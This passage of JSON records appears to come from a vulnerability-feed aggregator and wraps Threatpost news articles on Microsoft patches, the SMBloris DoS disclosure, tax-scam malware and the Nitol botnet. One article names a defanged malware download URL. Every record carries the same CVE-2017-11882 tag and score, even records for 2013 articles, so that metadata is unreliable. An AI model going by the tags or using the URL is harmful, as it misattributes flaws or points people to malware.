vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. 
\u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months.\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third-party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered by viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. 
An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. 
Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all of which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002 will address the zero day; Childs acknowledged back in December that Microsoft was working on a patch for the issue, which stems from a kernel vulnerability that allows local privilege escalation to kernel level.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). 
The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution vulnerability in Microsoft\u2019s SharePoint Server and Microsoft Word, the third will fix an elevation of privilege vulnerability in Windows 7 and Server 2008 R2, and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nAs usual, Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. 
The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SignalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. 
\u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability allows local privilege escalation to kernel level.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected; later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as installing new software, manipulating data, or creating new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended disabling the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. 
Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. 
The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA), giving the attacker the privileges of the transcoding service that renders the document on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with OWA the attachment is rendered server-side: Exchange processes the document with Outside In before sending it to the browser, which exposes the server itself rather than the workstation to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off the document-rendering mode are not affected; documents such as PDFs would instead be processed on the client by a reader such as Adobe Reader or Foxit, avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for the faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. 
\u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). 
The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. 
An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. 
An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows &, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical 
because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett 
said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:21", "description": "LAS VEGAS\u2014A 20-year-old Windows SMB vulnerability is expected to be disclosed Saturday during a talk at DEF CON.\n\nMicrosoft has said it will not patch the vulnerability, which allows an attacker to remotely crash a Windows server with relative ease using only 20 lines of Python code and a Raspberry Pi.\n\nThe vulnerability affects every version of the SMB protocol and every Windows version dating back to Windows 2000. It was likely introduced into the operating system much earlier, said Sean Dillon, senior security researcher at RiskSense. Dillon, who conducted his research with colleague Zach Harding, called the attack SMBloris because it is comparable to [Slowloris](<https://threatpost.com/mitigating-slowloris-http-dos-attack-062209/72845/>), a 2009 attack developed by [Robert Hansen](<http://ha.ckers.org/blog/20090617/slowloris-http-dos/>). 
Both attacks can use a single machine to crash or freeze a much more powerful server, but Slowloris, unlike SMBloris, targets webservers.\n\n\u201cSimilar to Slowloris, it requires opening many connections to the server, but these are low-cost connections for the attacker, so a single machine is able to perform the attack,\u201d Dillon said.\n\nDillon was among the first researchers to analyze EternalBlue, the leaked NSA SMB exploit that was used to spread the WannaCry ransomware attack and ExPetr wiper malware. It was during that analysis that Dillon uncovered this issue.\n\n\u201cWhile working on EternalBlue, we observed a pattern in the way memory allocations were done on the non-paged pool of the Windows kernel. The non-paged pool is memory that has to be reserved in physical RAM; it can\u2019t be swapped out,\u201d Dillon explained. \u201cThat\u2019s the most precious pool of memory on the system. We figured out how to exhaust that pool, even on servers that are very beefy, even 128 GB of memory. We can take that down with a Raspberry Pi.\u201d\n\nThe issue was privately reported to Microsoft in early June as the EternalBlue analysis was completed, Dillon said. Microsoft told the researchers that two internal security teams concluded the vulnerability was a moderate issue and would not be moved into the security branch, and likely never fixed. Saturday\u2019s DEF CON talk will be 60 days after the initial report was sent to Microsoft and 45 days after Microsoft\u2019s response was relayed.\n\n\u201cThe case offers no serious security implications and we do not plan to address it with a security update,\u201d a Microsoft spokesperson told Threatpost. 
\u201cFor enterprise customers who may be concerned, we recommend they consider blocking access from the internet to SMBv1.\u201d\n\n\u201cThe reason they say it\u2019s a moderate issue is because it does require opening many connections to the server, but you could do it all from a single machine, and a Raspberry Pi could take down the beefiest server,\u201d Dillon said.\n\nThe vulnerability lies in the way SMB packets are processed and memory is allocated. Dillon and Harding said they found a way to take advantage of that allocation system to crash a server.\n\n\u201cIt will amplify already existing attacks like DDoS attacks,\u201d Dillon said. \u201cWhy DDoS when you can DoS from a single machine. You don\u2019t need a botnet to take down a Windows server.\u201d\n\nThe attack is able to allocate all memory a server has available, to the point where it won\u2019t even blue screen, Dillon said. The operating system crashes as it looks through long memory lists looking for unallocated memory, causing the CPU to spike.\n\n\u201cYou get critical services to crash and you can completely freeze the system,\u201d Dillon said. \u201cThere are also lots of integrity issues because when you have all the non-paged pool memory allocated already, certain disk rights, even logging can\u2019t take place because there\u2019s no memory. One of the problems we\u2019ve run into is that we\u2019ve completely exhausted the system and cause it to freeze; one of the reasons it doesn\u2019t blue-screen is because it doesn\u2019t have enough resources needed to blue-screen. 
It will freeze and never come back.\u201d\n\nDillon said he and Harding will share some additional technical details during their talk and will demo the attack.\n\n\u201cIt\u2019s such a simple attack really; I think a lot of the people there will be able to catch on to what\u2019s happening,\u201d Dillon said.\n\nAs for a fix, Dillon believes it wouldn\u2019t be a simple task for Microsoft.\n\n\u201cI think that\u2019s the problem is that it\u2019s not the easiest fix; it\u2019s the way they\u2019ve done SMB memory allocation for over 20 years. So everything relies on the fact the client says \u2018I have a buffer that I\u2019m sending that\u2019s this big.\u2019 The server reserves that much memory so it can handle it,\u201d Dillon said. \u201cWhat we did we say I have a huge buffer and never send the buffer. There\u2019s still a lot of components that rely on the fact that buffer is already allocated and the size is already known.\u201d\n\nDillon said a mitigation can be applied through inline devices including firewalls by limiting the number of active connections from a single IP address to SMB ports.\n\nIronically, the only reason Dillon and Harding found the bug was because this critical information is used in the pool grooming for EternalBlue.\n\n\u201cYou have to have those allocations happen,\u201d Dillon said. 
\u201cSo actually, if this behavior was not the way it was, the pool grooming in EternalBlue would not be the same and the exploit might not work at all.\u201d\n", "cvss3": {}, "published": "2017-07-26T09:00:26", "type": "threatpost", "title": "Windows SMB Zero Day to Be Disclosed During DEF CON", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-07-31T22:05:32", "id": "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "href": "https://threatpost.com/windows-smb-zero-day-to-be-disclosed-during-def-con/126927/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and adds to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. 
Microsoft says scammers are also targeting certified public accountants with email subject lines \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warns recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Emails with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. 
Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. 
Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/>)When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. 
loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d wrote [Rex Plantodo of the Microsoft Malware Protection Center.](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>)\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can launch DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. 
